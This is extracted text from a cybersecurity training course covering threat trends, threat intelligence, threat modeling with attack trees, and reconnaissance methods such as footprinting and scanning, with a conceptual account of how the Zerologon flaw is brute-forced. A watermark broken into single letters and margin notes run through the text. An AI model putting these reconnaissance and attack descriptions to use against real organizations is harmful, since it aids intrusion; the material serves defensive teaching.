Figure 2-2: An example of a reputable security resource on the Internet.
e
After gathering trend data, you can apply that data to your systems wherever it is relevant. You'll
at
want to analyze key organizational resources like operating system logs, output from hardware and
software tools, and data, to determine what is affected by these trends and how. For example, a new
flaw in the Linux kernel will prompt you to identify your most sensitive systems running Linux, and
lic
then develop a plan of action for patching those systems (if such a patch is available) with minimal
disruption.
up
Commonly Targeted Assets

While you can count on just about every piece of information being a potential target, certain Commonly Targeted
D
information assets are much more commonly attacked than others. These targets are especially Assets
attractive to attackers in our modern, interconnected world. The reasons are generally twofold: one,
these targets can lead to great payouts for the attacker, and consequently, significant damage to the
ot
victim(s); and two, because these targets have become so ubiquitous and essential to everyday life in
the developed world, securing them is a major challenge.
N
The following are some of the most popular targets in the current threat landscape:
• Computing and power resources: Computing assets are always a popular target because of
how crucial they are to any organization's infrastructure. They are the foundation on which all of
o
the proceeding assets are built and operated. If an attacker can compromise the foundation, then
they'll have an easy time compromising everything else. Similarly, computers depend on power to
D
function, and if an attacker can compromise power resources like electric generators, they can
cause major disruption and service outages for many organizations and citizens.
• Financial information: It's not hard to guess why an attacker would go after an individual's or
organization's financial information, but many people overlook how much easier it has become
for attackers to actually succeed in stealing money from victims. Everyone has a bank account,
and most people do their banking online—not to mention all of the credit card purchases they

make from online vendors. This makes it almost inevitable that enough people and companies
will mishandle their financial information for attackers to capitalize on.
• Account information: People sign up for so many disparate services online they end up with
more accounts than they can even remember. This causes people to be careless with their
credentials, especially their passwords; why come up with a strong password for an account
you're just going to forget in a week? Attackers pounce on weak account information to begin
assuming a user's identity, even if that account is limited in what it can do. People often use the
same credentials or profile information across multiple accounts, which only adds to the attack
surface of a person's digital identity.
e
• PII and PHI: Users place trust in companies, especially those running web services, to keep
their personally identifiable information (PII) and protected health information (PHI) safe from
ut
prying eyes. There's been no shortage of recent PII and PHI breaches in the news, however.
Attackers seek out PII and PHI to sell a person's contact information to the highest bidder, but
ib
they also leak certain details about a person's identity or health to harass, frustrate, and embarrass
their victims.
• Intellectual property: Easy access to powerful software and hardware tools can help users
tr
circumvent digital rights management (DRM) mechanisms. Companies or individuals that deal in
copyrighted materials like video, audio, and interactive assets are particularly at risk. Likewise,
is
trade secrets are commonly targeted as part of corporate espionage and sabotage efforts, as well
as extortion attempts. Despite their efforts to stem online piracy, content developers and
D
publishers frequently see their assets distributed on file sharing services.
• National security data: The rise of cyberwarfare, cyberterrorism, and hacktivism has, on several
occasions, led to the compromise of national security data. For example, in 2020, multiple
or
government agencies and government contractors across the world suffered data breaches that
exposed sensitive documents, source code, security tools, cryptographic secrets, and much more.
U.S. officials identified the Russian government as the most likely suspect, implying that this
attack was state sponsored.
e
at
The Latest Vulnerabilities

The Latest Some of the latest vulnerabilities as of mid-2021 include:
lic
Vulnerabilities • As always, social engineering will continue to be one of the most effective forms of attack. There
are two vulnerabilities that still contribute to this: poorly educated and trained Internet users, and
companies that refuse to implement robust security measures like backing up critical data offsite
up
or offline to defend against ransomware.

• In the midst of the COVID-19 pandemic, the world saw a huge increase in remote work. As a
result, home computer setups become a major area of vulnerability as employees regularly
D
interface with the company network from home networks that are not nearly as secure. In
addition, flaws in VPN software will have a significant impact.
• APIs are becoming more and more common for users to access, but their security has often
ot
lagged behind. Unsecured APIs enable an attacker to gain a foothold into more than just one
target, and third-party targets as well. Traditional defense mechanisms are inadequate against
automated attacks against APIs.
N
• High-profile vulnerabilities in Microsoft products, like Microsoft Exchange, Windows, and

Microsoft 365, are also becoming a popular target for exploitation. Although fixes for these
vulnerabilities are usually issued quickly, unpatched systems will still be a major vector.
o
• As more and more organizations offload their operations onto the cloud, the degree to which
D
these organizations ignore the unique security challenges of the cloud will also increase. Poorly
secured cloud infrastructure will be an attractive target to attackers looking to steal data or cause
disruption to services. Attackers may even be able to deploy malicious virtual infrastructure
within a cloud environment, causing harm that appears to come from a legitimate source.

The Latest Threats and Exploits

Some of the latest threats and exploits include the following: The Latest Threats and
• Ransomware has proven very effective recently, and cybercriminals will likely continue to target Exploits
business entities they think will pay them large sums of money. In particular, cybercriminals may
target individual organizations and hold assets for ransom that are critical to the organization's
entire production processes—that way, the attacker is more likely to force the organization to
pay up.
• Ransomware as a Service, or RaaS, is rising in online criminal communities. Cybercriminals are
e
creating automated ransomware kits and selling them to script kiddies who are interested in quick
ut
and effective means of extorting money from a victim. The high demand for these kits has made
it more worthwhile for their authors to incorporate advanced features, especially anti-malware
evasion techniques. The selling of malicious services is not a new phenomenon; for years,
ib
attackers have rented out botnets for use in denial of service attacks. However, this malicious
business model has only recently extended into the domain of ransomware.
• State-sponsored attack programs are on the rise. The scope and impact of these attack programs
tr
is likely to increase significantly in the near future. This means critical infrastructure will likely
become a bigger target for attackers looking to do more damage.
is
• Some attackers are taking advantage of the public health crisis by specifically targeting the
healthcare sector to glean PHI. For example, the rise of remote doctor's visits has, like remote
D
work, greatly expanded the attack surface. Even beyond PHI, attackers are attempting to steal
highly sensitive data concerning COVID-19 treatments and vaccines to either sell the
information, tamper with it, or destroy it.
or
• Many computer technologies, in the cybersecurity field and elsewhere, are becoming more
empowered by artificial intelligence (AI). If effective, cybercriminals can use AI to create exploits
that adapt to their target environments and operate more efficiently and silently. In some cases,
AI may be able to generate novel attacks, not just boost existing ones.
e
at
The Latest Security Technologies

lic
Outdated technology is replaced by newer, more effective technology all the time. Security tools and The Latest Security
prevention techniques are no different. Some security technologies that are relatively new and/or Technologies
emerging in the business world are:
up
• Machine learning and deep learning will not just help attackers, but security personnel as well.
AI-powered threat management tools are particularly of interest, as they can identify threats and
respond to them much more quickly and with a greater degree of accuracy than a human
operator. If properly tuned, these AI systems may be able to prevent intrusions that otherwise
D
would have wreaked havoc or even gone unnoticed.

• Endpoint detection and response (EDR) solutions are similar to host-based intrusion
prevention systems (HIPSs) in that they spot undesired activity on a host machine and take
ot
action to stop that activity. The difference is that EDR systems tend to offer more advanced
detection and response techniques; for example, they can leverage online threat databases in real
time, use machine learning to detect complex or previously unknown threats, and so on.
N
• Cloud access security brokers (CASBs) act as a defensive screen between clients accessing cloud
services and the cloud services themselves. CASBs monitor cloud-based activity for potentially
o
malicious behaviors while also enforcing the organization's security policy.

• Blockchain tools leverage cryptography to create a chain of trust that maintains the integrity of
D
records in the chain (called a ledger). Aside from cryptocurrency, the blockchain sees use
primarily to support secure ledgers in the banking industry, but it is also applicable to any
scenario that requires a decentralized chain of trust.
• User behavior analytics (UBA) evaluates the activities of users in order to identify any such
activity that matches known patterns of malicious or otherwise undesired behavior. Although
traditional security systems can detect some patterns of known behavior, UBA goes one step
further by identifying factors or characteristics of undesired behavior that are not immediately

apparent to a human security professional. As such, they typically incorporate AI decision

making.
Trend Data Analytics

Trend Data Analytics Data analytics is the process of applying analytical techniques (e.g., statistics) to data to reveal
patterns that can inform decision making. While looking at individual events can provide focused
information, looking at all the data as a whole through the lens of analytics can expose important
trends. These trends can help you gain information not only on the threats the organization is
e
currently facing, but also what threats may be coming in the future and what countermeasures are
ut
emerging to deal with them. You should be able to analyze and interpret trend data to anticipate the
cyber-defense needs of your organization, and stay one step ahead of the attackers.
ib
tr
is
D
or
e
at
lic
Figure 2-3: The number of vulnerabilities by six major vendors over a five-year period as tracked
up
by the CVE. Source: https://www.cvedetails.com/top-50-vendors.php.
Proper data analytics relies on having a great deal of useful data to draw from. This data can come
D
from a variety of sources, including internal monitoring platforms that record network traffic, as
well as external sources like the CVE and other security databases, and many more. The data from
these sources is put through a process called extract, transform, and load (ETL), in which the
ot
data is collected, combined, cleaned, prepared, and processed to make it more conducive to a deeper
analysis. Various statistical methods and visualizations are applied to the data to reveal useful
patterns. The data may even be used to generate machine learning models that can do a better job of
N
predicting trends.
Note: Data analytics is an entire field of study of its own, and a deeper dive is beyond the scope
o
of this course.
D
"Soft" Trend Analysis

Not all analysis needs to incorporate hard data. The information you absorb from your surroundings
is just as important. Attending conferences, listening to podcasts, reading blog posts, and staying
engaged on social media all contribute to a larger awareness of the emerging threat and defense
climates. Identifying trends requires more than just passive absorption of information, however.
You need to exercise careful judgment to separate the signal from the noise, and to avoid being
tripped up by misleading information, distractions, and other pitfalls of poor critical thinking.

Remember, security should not be reactive, but proactive; this could mean the difference between
scrambling to mitigate a security incident and not suffering the incident at all.
Trend Reports and Documentation

After analyzing trend data, you should prepare to present your findings to an audience. Like any Trend Reports and
other report, the form it takes and the amount of technical information it includes will both depend Documentation
on who your audience is. Still, the following are some common topics to include in a report about
security posture trends:
e
• Ongoing trends you've identified in the world of cybersecurity, including threats, vulnerabilities,
ut
and technologies.
• Trends that are not yet ongoing, but which industry experts predict will soon come to fruition.
• Examples of why these issues are actually trends and not just isolated one-off incidents.
ib
• Which of the identified trends are most relevant to your current security posture, and which are
less relevant (or not relevant at all).
tr
• What assets are affected by these trends, and how.
• Evidence that these trends have already been affecting your assets or soon will.
is
• What controls the organizational currently has in place to deal with these issues, and whether or
not they are adequate.
D
• Suggestions for updating controls or obtaining new ones to deal with the latest trends.
• Necessary "big picture" changes to your security posture, e.g., fostering a better cybersecurity
culture in the organization or rewriting policies to account for major landscape changes.
Threat Intelligence Lifecycle

or
e
The threat intelligence lifecycle is the comprehensive process of addressing emerging threats and Threat Intelligence
threat sources. One of the most prominent ways to conceptualize this lifecycle is by dividing it into Lifecycle
at
five different phases or actions, collectively called TCPED: Ensure students

understand that the term
• Tasking, in which a decision maker or other stakeholder requests information.
"exploitation" in this
lic
• Collection, in which relevant data is identified and gathered within a reasonable time frame. context does not refer to
• Processing, in which the data is prepared to make it easier to use for exploitation (whether by a an attacker taking
human, hardware, or software). advantage of a
up
• Exploitation, in which the significance and the implications of the processed data are identified vulnerability, but a
researcher extracting
and interpreted.
value from intelligence
• Dissemination, in which actionable exploitation findings are distributed to the tasking authority data.
in a timely manner.
D
ot
N
o
D

e
ut
ib
tr
is
D
or
e
at
lic
up
Figure 2-4: TCPED as a lifecycle supporting threat intelligence.

D
TCPED Architecture
TCPED Architecture Organizations interested in threat intelligence can create a security architecture that implements
ot
TCPED. Although the five phases remain the same, each organization's architecture will be different
based on its own business needs and unique environment. Much of what has already been discussed
in this topic can affect the form and function of that architecture. For example, the sources you
N
collect data from will obviously affect the collection phase of TCPED, but they may also have an
impact on how the data is processed if each source formats data differently.
o
Likewise, how you disseminate threat intelligence will change based on the tasking authority. You'll
need to identify the relevant policies and procedures to know who is authorized to receive the threat
D
intelligence report, and how. For example, service-level agreements (SLAs) for threat intelligence
providers will likely list the personnel the information should be disseminated to, and what the
required channels are for that dissemination.
There are several other factors that affect the TCPED architecture, including, but not limited to:
asset inventory, threat modeling, network scanning, forensic investigation, and e-discovery.

Guidelines for Analyzing Trends Affecting Security Posture

Follow these guidelines when analyzing trends affecting security posture. Guidelines for Analyzing
Trends Affecting
Analyze Trends Security Posture
When analyzing trends:
• Seek out industry-accepted and reputable sources of security information.
• Corroborate information across multiple sources.
e
• Consult blogs, books, organizations, vulnerability databases, advisory websites, mailing lists, and
social networking sites for security information.
ut
• Exercise discretion and critical thinking as part of your overall situational awareness.
• Recognize the most commonly targeted assets in the current threat landscape.
ib
• Identify some of the most recent vulnerabilities, especially ones with relevance in your
organization.
• Identify the key threats and exploits that may cause trouble for your organization in the near
tr
future.
• Familiarize yourself with recent security technologies such as blockchain tools and machine
is
learning tools.
• Stay informed about the trends in your industry and the cybersecurity industry in general.
D
• Use data analytics to glean insights from trend data.
• Ensure your trend reports are comprehensive and provide suitable evidence of your claims.
• Consider how multiple factors can affect your threat intelligence architecture.
or
e
at
lic
up
D
ot
N
o
D

ACTIVITY 2-2
Analyzing Trends Affecting Security Posture
Before You Begin
e
You'll be using your Windows® 10 client for this activity.
ut
Activity: Analyzing
Trends Affecting Scenario
Security Posture
As a security practitioner at Develetech, you want to make sure your knowledge of the threat
ib
landscape doesn't lag behind. As part of a new initiative, you'll do research in various areas to gain a
better awareness of your company's security situation. You'll start by finding security-minded blogs
tr
to regularly reference. Then, you'll look up recent vulnerabilities you suspect might affect your
systems.
is
Because Develetech is growing and expanding some of its infrastructure, you'll also want to keep
pace with evolving technology and its implications so that you'll be prepared for the future. All of
this research will keep you and your organization from falling behind in an industry that is always
D
moving forward.
Use this activity as a
vehicle for discussion.
What have students
learned from perusing
these resources? How
1. Find information security blogs.
a) Open a web browser.
or
e
can this knowledge b) Navigate to the web search site of your choice and search for security blogs
affect the security in c) Select any of the results and skim some of the blog's most recent articles. Identify the author(s) and
at
their organizations? evaluate how security subjects are presented. Are the articles objective and free of bias? Do they
Be mindful of your timing rely on subjective accounts and experiences? Are they sensationalized? What else can you
during this activity. Make determine about the author(s)' experience and perspective?
lic
sure to monitor student d) Repeat this process for some of the other blogs returned in your search.
progress and keep them e) Share with the class what you've determined about each blog, and which ones, if any, seem like
on the relevant track. reputable and useful sources of information.
up
If the websites have

been updated, the
navigation steps may
2. Consult a vulnerability database about the Zerologon vulnerability.
vary. Check for changes a) Navigate to https://cve.mitre.org.
D
before class. b) From the navigation options at the top of the CVE home page, select the Search CVE List link.
c) In the Keyword search text box, type netlogon
d) Select Submit.
ot
e) Read the summary for the item in the list named CVE-2020-1472. A vulnerability exists in the design
of Windows' Netlogon Remote Protocol (MS-NRPC) that can enable a privilege elevation when an
attacker connects to an Active Directory domain controller.
N
f) Select the CVE-2020-1472 link to get a more detailed look at the issue. Select any of the links in the
References section to learn more about the technical aspect of the vulnerability—referred to as
Zerologon—and how it affects Active Directory domain environments.
o
Zerologon is one of the most commonly exploited vulnerabilities today and has been used to attack
multiple different industries around the world. The attacker merely needs to establish a connection
D
with the domain controller to be able to perform the attack. When establishing a connection, the
attacker issues an 8-byte plaintext challenge to the Netlogon service, which then encrypts that
challenge with a session key and produces 8 bytes of ciphertext as a result. The initialization vector
(IV) used to perform the encryption is flawed in that it is a fixed value of 16 bytes of zeros. There is a
1 in 256 chance that an input of 8 bytes of zeros will lead to an encrypted output of 8 bytes of zeros.
When this happens, the server believes the client has proven knowledge of the session key, so it
authenticates that client. The attacker keeps issuing challenges until this happens.

Because Netlogon authentication does not restrict the number of attempts like a normal user
account, the attacker can simply achieve success through brute force. Once authenticated to the
domain controller, the attacker can exploit it in a number of significant ways.
g) Search the CVE for any other specific or general vulnerability that interests you. Share your findings
with the class.
If you're teaching this in
3. Research issues related to evolving technology. 2022 or later, consider
looking for an updated
a) Navigate to https://www.gartner.com/smarterwithgartner/gartner-top-strategic-technology-trends-
report by Gartner or any
for-2021/.
other technology firm to
e
Note: Alternatively, you can go to https://www.gartner.com and search for top stay current.
ut
strategic technology trends.
b) Identify the most significant emerging technologies of the year.
ib
c) Discuss your findings with the class. Will any of these emerging technologies have an effect on your
organization's security? If so, how?
tr
4. Close your browser.
is
D
or
e
at
lic
up
D
ot
N
o
D

Summary
In this lesson, you analyzed the ever-evolving threat landscape by identifying the various
characteristics of threats to computer systems. You also performed ongoing analysis of other factors
affecting your organization's security posture. When you make the effort to understand your
opposition and adapt to it, you'll be better prepared to face security incidents.
Describe the threats that are the biggest concern to your organization or one
e
use the social
networking tools you're familiar with. What are their skill types, motives, intentions, and so on?
ut
provided on the CHOICE A: Answers will vary. Students who work for financial companies may be predisposed to experienced
Course screen to follow cybercriminals looking to steal money from their organizations or customer accounts. Their vector of
choice may be stealth based in order to avoid notice and maximize their take. Students who work for
ib
large, public-facing corporations may be more worried about attackers looking for recognition or
and resources to support power. In this case, the attacker may take a more overt approach to their attack. Students who work
for the public sector may see hacktivists and cyberterrorists as more pressing threats. These
tr
continued learning.
attackers are highly motivated and often attack in a more non-targeted fashion to cause any damage
they can.
is
What new vulnerabilities, threats, and technologies concern you the most?
Why?
D
A: Answers will vary. Students may be concerned about the effectiveness of ransomware, especially if
their employees are poorly trained on security issues. The rise of IoT technologies may not
or
immediately impact businesses that work with only traditional computer devices, but the
interconnectedness of all devices is inevitable and significantly challenging to secure. The leveraging
of AI, machine learning, and other automation disciplines in both attack and defense scenarios is also
quickly becoming a major source of concern.
e
at
lic

up
D
ot
N
o
D
Lesson 2: Analyzing the Threat Landscape |

3 Analyzing
Reconnaissance Threats
e
ut
to Computing and
Network Environments
ib
tr
Lesson Time: 2 hours, 30 minutes
is
D
Lesson Introduction or
e
Before threat actors launch their attack in earnest, they gather information. The information
available to them is almost always a result of their target's behavior. The attacker simply
at
does their own research, and suddenly they've made their job a lot easier. You need to
analyze just what attackers can learn from your organization to get a better picture of what
they'll attack, and how.
lic
Lesson Objectives
up

• Implement threat modeling tools and tactics.
D
• Assess the impact of reconnaissance.

• Assess the impact of social engineering.
ot
N
o
D

TOPIC A
Implement Threat Modeling
Before you begin assessing particular threats to the organization, you need to develop a general
strategy for modeling these threats. Threat modeling will enable you to anticipate the process of a
cyber attack, as well as provide you with a threat's impact and possible countermeasures.
e
ut
The Diverse Nature of Threats
The Diverse Nature of Not all threats are strictly technical. Threats may also come from sources such as poor physical
ib
Threats controls (e.g., open or unlocked doors) or vulnerabilities to social engineering (e.g., reckless user
behavior or lack of awareness). Threats may also stem from a corporate culture that disregards the
importance of security, or from a lack of management support and understanding. All of these
tr
variables and more comprise a threat's tactics, techniques, and procedures, or TTPs.
is
While this course focuses primarily on technical TTPs, every tactic, technique, and procedure is
important and should be carefully considered in the organization's risk management processes.
D
The Anatomy of a Cyber Attack
The Anatomy of a Cyber
Attack
Ensure students
understand that attacks
or
To begin understanding how threats can affect your systems, you must understand the actual
components of a cyber attack. Security organizations have come up with several different models to
break down the cyber attack to its core processes. For example, defense contractor Lockheed Martin
developed its Cyber Kill Chain® to describe the anatomy of a cyber attack.
e
are not always linear—
they can go back and
A more general anatomy of a cyber attack is:
at
forth between the 1. Reconnaissance

different phases.
The attacker collects intelligence on their target.
lic
2. Attack
The attacker initiates the attack and compromises the target systems.
3. Post-Attack
up
The attacker covers their tracks and/or leaves covert exploits on the target systems as a
persistent threat.
D
ot
N
o
D
Lesson 3: Analyzing Reconnaissance Threats to Computing and Network Environments | Topic A

e
ut
ib
tr
is
Figure 3-1: A streamlined representation of the cyber attack process.
D
An Expanded Approach
The previous approach to a cyber attack can be further expanded into more distinct phases:
1. Reconnaissance
2. Scanning
3. Gaining access
or
e
4. Persistence
5. Expanding access
at
6. Covering tracks
Scanning is often seen as a component of reconnaissance, but it's sometimes seen as a distinct
lic
phase. In this case, reconnaissance is more passive and involves referencing public sources of
intelligence, whereas scanning is more active and involves targeting private assets. The remaining
phases only really apply to an intrusion-style attack. Phase three can fit in the general "attack" phase,
up
and the phases after it can be placed under the larger umbrella of the "post-attack" phase.
More on the Cyber Kill Chain

D
Lockheed Martin developed the Cyber Kill Chain to reposition the advantage toward defense.
Typically, the defender has the disadvantage because they must plug every security hole, whereas the
attacker only needs to find one hole in the security framework to be successful. The Cyber Kill
ot
Chain tries to turn this around by helping defenders stop an attacker at any point in the chain,
disrupting the attack entirely. Although this seems like an attractive model to adopt, the Cyber Kill
Chain also has its weaknesses; chiefly, that it relies too heavily on traditional, perimeter-based
N
prevention solutions. If an attacker breaches the firewall or intrusion detection system (IDS) at
the perimeter, the Cyber Kill Chain can be ill-equipped to deal with the attack.
The phases of threats as defined by the Cyber Kill Chain are as follows. Keep in mind that some
o
threats may not necessarily need all seven phases:

D
1. Reconnaissance
2. Weaponization
3. Delivery
4. Exploitation
5. Installation
6. Command and Control
7. Actions on Objectives

Note: For more information on the Cyber Kill Chain, visit https://
www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html.
Threat Modeling
Threat Modeling Threat modeling is the process of identifying and assessing the possible attack vectors that target
systems. These models can encompass general security in an organization or they can apply to
specific systems that are the target of an attack. In addition, some threat models are attacker focused
e
rather than asset focused. Either way, a threat model will assist you in evaluating the risks involved
in a potential attack, as well as the best course to take to mitigate its effects.
ut
The earlier you develop an approach to respond to threats, the easier it will be to mitigate them.
Security is best when it is proactive, not reactive, so waiting for an attack to happen without
ib
identifying and understanding it first will hurt your assets in the long run. Threat modeling also
helps you structure security in a more comprehensive way. You can ensure that you don't miss a
detail, however small, that could significantly impact your organization and its assets. Threat
tr
modeling using graphs and charts also helps you and relevant stakeholders visualize threats so they
are easier to digest.
is
Approaches to Threat Modeling
D
Threat Modeling The characteristics of a threat depend heavily on what that threat targets. Therefore, there are
Process multiple approaches to threat modeling. The following is an example of a generic asset-focused
threat modeling process:
or
1. Identify security objectives and requirements. What are your organization's policies and business
needs?
e
2. Identify the architecture of the target system, including its components, roles, services, and
dependencies.
at
3. Decompose the system further to identify how it functions and how those functions can be
vulnerable. For example, how does your application ensure the confidentiality of data in
lic
transmission?
4. Identify known threats to the target system. Research exploitation databases and other sources of
security intelligence.
up
5. Determine ways to mitigate these threats.

D
ot
N
o
D

e
ut
ib
tr
is
Figure 3-2: A general approach to threat modeling. The process is repeatable for each system
you profile.
D
You may wish to inform
STRIDE students of other
STRIDE is an acronym that stands for:

• Spoofing
or
Security professionals that construct threat models often classify threats in terms of STRIDE.
approaches to threat
modeling.
e
• Tampering
at
• Repudiation
• Information disclosure
• Denial of service
lic
• Elevation of privilege
up
Attack Trees
Other than the general process of modeling a threat, you may also implement visual aids that more Attack Trees
specifically outline how a threat operates. For example, assume that you have developed an app that
D
has an instant messaging capability. As you go through your threat modeling process, you identify
the threat of a malicious user intercepting messages not meant for them. To model this threat, you
can create an attack tree that identifies the threat, how the threat can occur, and how to mitigate
ot
these vulnerabilities, all in an easily parsed graph.

N
o
D

e
ut
ib
tr
is
Figure 3-3: An attack tree evaluating a man-in-the-middle threat to an instant messaging
D
feature in an app.
Attack trees can be as simple or complex as your needs dictate. The aforementioned example is
or
relatively simple, whereas a more complex tree will add a number of factors, including:
• Having multiple levels of attack vectors, especially if one attack vector leads to another. This
establishes a parent–child relationship.
e
• Including all possible attack vectors as sub-nodes of the root threat.
• Assigning a probability to each attack vector node, depending on how likely it is for an attacker
at
to use the vector.

• Differentiating between "AND" nodes and "OR" nodes, with the former requiring multiple
lic
vectors to climb to the next highest node on the tree and the latter requiring only one.
• Assigning monetary loss values to each attack vector.
• Assigning cost values to each control/mitigation node.
up
Note: For a more in-depth exploration of attack trees, visit https://www.schneier.com/

paper-attacktrees-ddj-ft.html.
D
Threat Modeling Tools

ot
Threat Modeling Tools There are several tools that can make the task of threat modeling easier and more productive. The
following table describes some of the more common ones.
N
Tool Description
Microsoft® SDL A freeware tool developed by Microsoft to integrate with their Security
o
Threat Modeling Tool Development Lifecycle (SDL) framework. Primarily used by software
developers. It integrates the STRIDE classification.
D
Trike An open source tool that also provides automation capabilities.

ThreatModeler A tool that can pull threat information from various databases into the
threat model. It also places an emphasis on easing collaboration with
stakeholders. There are several editions that offer varying levels of
features.

Tool Description
Open Source An open source tool intended to integrate with a systems development
Requirements lifecycle (SDLC) framework. Also includes threat modeling capabilities.
Management Tool
CORAS Risk An open source tool designed around the CORAS model of risk
Assessment Platform assessment. Also includes threat modeling capabilities.
draw.io A general purpose open source diagramming tool available as an online
e
web app (https://draw.io) and also a standalone desktop application.
Although not specifically designed with attack trees in mind, it can be
ut
used to easily create them.
ib
Threat Categories
It's useful to categorize threats that have some qualitative similarities or differences. This can help Threat Categories
tr
guide your approach to those threats and tailor that approach to your organization's unique Inform students there
circumstances. This course recognizes the following threat categories: are other ways to
is
categorize threats.
• Reconnaissance
• Social engineering
D
• System hacking
• Web-based threats
• Malware
• Hijacking and impersonation
• Denial of service
• Mobile-based threats
or
e
• Cloud-based threats
at
lic
up
D
ot
N
o
D

ACTIVITY 3-1
Analyzing a Threat Model
Data Files
e
C:\CNX0013Data\Analyzing Reconnaissance Threats to Computing and Network Environments
\web_server_attack_tree.png
ut
\web_server_attack_tree.drawio
ib
Activity: Analyzing a
Threat Model (2 Slides) Scenario
tr
Use the second, The security team wants to redesign Develetech's security from the ground up, and a big step in this
animated slide to go process will involve understanding the threats the organization is exposed to. You'll focus on one of
through the attack tree the more likely threats—an attack on Develetech's web servers.
is
with students step by
step. You'll analyze an attack tree that maps out the different possible web-based attacks, and the
suggested mitigation techniques for each. With complete and comprehensive threat models, your
D
Time permitting, and if
students show interest, organization will be better prepared to defend itself against attacks in a timely and efficient manner.
consider using the
Note: The attack tree is presented as images in this activity. The full attack tree is also provided
draw.io app to either
import the attack tree
diagram and modify it
based on students'
answers to the
or
in the data files as a raster image (PNG) and as an XML-based file that can be imported into the
diagramming tool draw.io. You can navigate to https://app.diagrams.net to use the online
web app, or download the Windows desktop version from https://github.com/jgraph/
drawio-desktop.
e
questions, or create a
at
new one from scratch.

Students will learn more
about specific web- 1. Examine the root node of the diagram and the web server attack that it
lic
based threats later, so if

represents.
they are unable to
provide examples,
provide your own. 2. Can you think of any specific attacks that might fall under the general
up
Go to the first step of the category of web server attacks?

slide animation to reveal
the root node. A: Answers will vary, as there can be many potential attacks on a web server. The diagram provided
identifies three: Structured Query Language (SQL) injection attacks, cross-site scripting (XSS)
D
Consider drawing
attention to any attacks, and file inclusion attacks. Additional attack types include cross-site request forgery
subattacks or (XSRF/CSRF) attacks, directory traversal, and session hijacking.
countermeasures
ot
offered by students that 3. Examine the tree now that several subattacks have been added.
aren't part of the Notice that each subattack points toward the root attack node, implying that each of these are ways in
provided attack tree.
N
which a web server attack can be conducted.
4. Can you think of any specific countermeasures that might mitigate one or
o
more of these subattacks?

A: Answers will vary, as there can be many countermeasures to these attacks. The diagram provided
D
identifies three: using parameterized queries to mitigate SQL injection; limiting or sanitizing user
HTML input to mitigate XSS; and creating whitelists and access identifiers to mitigate file inclusion
attacks.
5. Examine the full attack tree.

Several countermeasures are now shown. An arrow points from each subattack to its corresponding
mitigating tactic. The arrows are dashed instead of solid to further distinguish them from the top set of
arrows.
6. What is the value in having this type of visual representation of a threat?

A: Answers may vary, but being able to visualize threats in a tree-like hierarchy can make it easier for
security personnel and even non-technical stakeholders to understand the security implications of
various technologies and processes that affect the organization. Attack trees are also a useful
component of a larger threat modeling strategy.
e
ut
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D

TOPIC B
Assess the Impact of Reconnaissance
Now that you've implemented threat models to analyze how your systems are susceptible to attack,
you can begin switching your focus to the specific threat categories. In particular, the type of threat
that is often the precursor to more direct attacks is reconnaissance. Understanding reconnaissance
e
techniques will reveal how much useful information you're unintentionally providing to malicious
users.
ut
Footprinting, Scanning, and Enumeration
ib
Footprinting, Scanning, Footprinting, scanning, and enumeration are the three processes that make up reconnaissance. The
and Enumeration information revealed in these processes can aid the attacker by exposing vulnerabilities or easily
tr
Ensure students exploitable vectors that can be used to attack an organization.
understand that
is
Footprinting is a phase in which the attacker gathers general information about a target and the
footprinting is not the
same thing as
people or systems that use it. The information gathered can center on the target's technology,
personnel, and structuring. Footprinting is typically done with the assistance of common, public
D
fingerprinting, which is
discussed shortly. tools, rather than requiring the attacker to directly compromise an organization's hosts or network.
In the next phase, scanning is a more active way of gathering information about a target. Attackers
or
will use scanning tools to discover information about various hosts and services running on a
network. The purpose of a scan is to reveal specific information about targets. Scanning requires
more direct access to a target than footprinting.
The last step of reconnaissance, enumeration, sees an attacker trying to connect to services and
e
retrieve detailed information from those services. This can include enumerating particular
at
networking protocols to discover how a network is structured (its topology) and how it is
vulnerable. Like scanning, enumeration requires a direct interface with the target.
lic
Footprinting Methods
Footprinting Methods There are several methods an attacker can use to glean preliminary information about a target:
up
• Publicly available information: With a web browser and an Internet connection, an attacker
can harvest information such as the IP addresses of an organization's Domain Name System
(DNS) servers; the range of addresses assigned to the organization; names, email addresses, and
D
phone numbers of contacts within the organization; and the organization's physical address.
These are often publicly available through Whois records, Securities and Exchange Commission
(SEC) filings, telephone directories, and more. Publicly available information is also referred to as
ot
open source intelligence.

• Dumpster diving: Attackers search through garbage to find sensitive information in paper
form. The names and titles of people within the organization enable the attacker to begin social
N
engineering to gain even more private information. This type of information is called closed
source intelligence because it is not meant to be publicly available.
o
• HTML code: The HTML code of an organization's web page can provide information, such as
IP addresses and names of web servers, operating system versions, file paths, and names of
D
developers or administrators.
• Social media: Attackers can also use social media sites like Facebook and LinkedIn to mine for
an organization's information. Depending on how much an organization or an organization's
employees choose to share publicly, an attacker may find posts or user profiles that give away
sensitive information or simply act as another vector or target for the attacker to take advantage
of.
Lesson 3: Analyzing Reconnaissance Threats to Computing and Network Environments | Topic B

• Search engines: Attackers targeting web applications can use search engines like Google™ and
Bing® to do their footprinting for them. These search engines can reveal much about web apps,
including domain information for where an app is hosted and the web technology it uses. The
attacker executes an automated script that runs queries on the search engine for a specific web
app, which then filters results by relevance.
• Metadata: Attackers can run metadata scans on publicly available documents using a tool like
Fingerprinting Organizations with Collected Archives (FOCA). For example, Microsoft Office
documents posted on the Internet may not directly divulge sensitive information about an
organization, but an attacker could glean useful information from its metadata, including the
e
names of authors or anyone that made a change to the document. By using search engines such
as Google and Bing, FOCA can also cross-reference files with other domains to find and extract
ut
metadata.
ib
tr
is
D
or
e
at
lic
Figure 3-4: Using FOCA to search Google.com for PDF metadata.

up
Network and System Scanning Methods

D
Attackers can employ various methods in scanning networks and systems. They may: Network and System
• Look for open ports. Open ports may present an attacker with a vector they can use to target a Scanning Methods
host.
ot
• Look for network access points. These may present an attacker with an opening to the network,
or the attacker may shut them down in a denial of service (DoS) attack.
N
• Find applications that are listening on certain ports. An attacker can use software against a host
and cause considerable damage.
• Identify technology used to construct web apps, such as JavaScript, that are known to be highly
o
vulnerable to various attacks.

• Discover network ranges. This can help an attacker identify which hosts are mapped to which
D
logical area of the network, or it may even reveal their physical location.
• Identify the operating environment of network hosts. This can make it easier for an attacker to
craft an operating system–specific attack.
• Scan network and system logs for information. Logs may reveal a great deal about how a
particular application, operating system, or device functions, as well as reveal current
configurations.

• Scan access control lists (ACLs) used by routers and firewalls. An attacker can use ACLs to
determine which pathways will be ineffective and which will grant them the access they seek.
Network scans manipulate the three-way handshake to gather their information:
